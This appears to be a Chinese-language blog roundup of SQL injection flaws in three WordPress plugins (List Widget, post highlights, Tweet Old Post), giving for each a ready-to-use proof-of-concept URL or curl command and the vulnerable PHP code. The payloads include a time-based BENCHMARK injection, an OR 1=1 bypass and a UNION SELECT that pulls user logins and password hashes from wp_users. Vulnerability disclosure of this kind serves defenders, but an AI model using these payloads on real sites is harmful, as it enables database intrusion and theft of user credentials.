最近的wordpress插件漏洞整理

# WordPress 的List Widget插件在低于 2.0.0版本中存在 SQL注入漏洞 # 测试版本: 2.0.0 --- PoC --- http://localhost/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0) --------------- 存在漏洞的代码 --------------- foreach ($_GET[''listItem''] as $position => $item) : $iterSql = "UPDATE $wpdb->users SET knr_author_order = $position WHERE ID = $item"; $wpdb->query($iterSql); endforeach; # WordPress的post highlights插件在低于2.2版本中存在SQL注入漏洞 # 测试版本: 2.2 # 备注: magic_quotes已经被关闭 --- PoC --- http://localhost/wp-content/plugins/post-highlights/ajax/ph_settings.php?id=-1'' OR 1=1--%20 --------------- 存在漏洞的代码 --------------- $id = $_GET["id"]; ... $query = "SELECT guid, ID FROM $wpdb->posts WHERE post_type=''attachment'' AND post_parent=''$id''"; # WordPress的Tweet Old Post插件在低于3.2.5版本中存在SQL注入漏洞 # 测试版本: 3.2.5 --------------- PoC (POST数据) --------------- URL: http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts POST 数据: delids=1&selFilter=excluded&cat=1=0) UNION ALL SELECT USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from wp_users#&setFilter=Filter&s=hello&chkbx=1 例如: curl --cookie "[COOKIE]" --data "delids=1&selFilter=excluded&cat=1) UNION ALL SELECT USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from wp_users#&setFilter=Filter&s=hello&chkbx=1" http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts --------------- 存在漏洞的代码 --------------- 70 if(isset($_POST["setFilter"])) 71 { 72 if($_POST["cat"] != 0) 73 { 74 $sql = $sql . " and p.ID IN ( SELECT tr.object_id FROM ".$wpdb->prefix."term_relationships AS tr INNER JOIN ".$wpdb->prefix."term_taxonomy AS tt ON tr.term_taxonomy_id = tt.ter m_taxonomy_id WHERE tt.taxonomy = ''category'' AND tt.term_id=" . $_POST["cat"] . ")"; 75 $cat_filter = $_POST["cat"];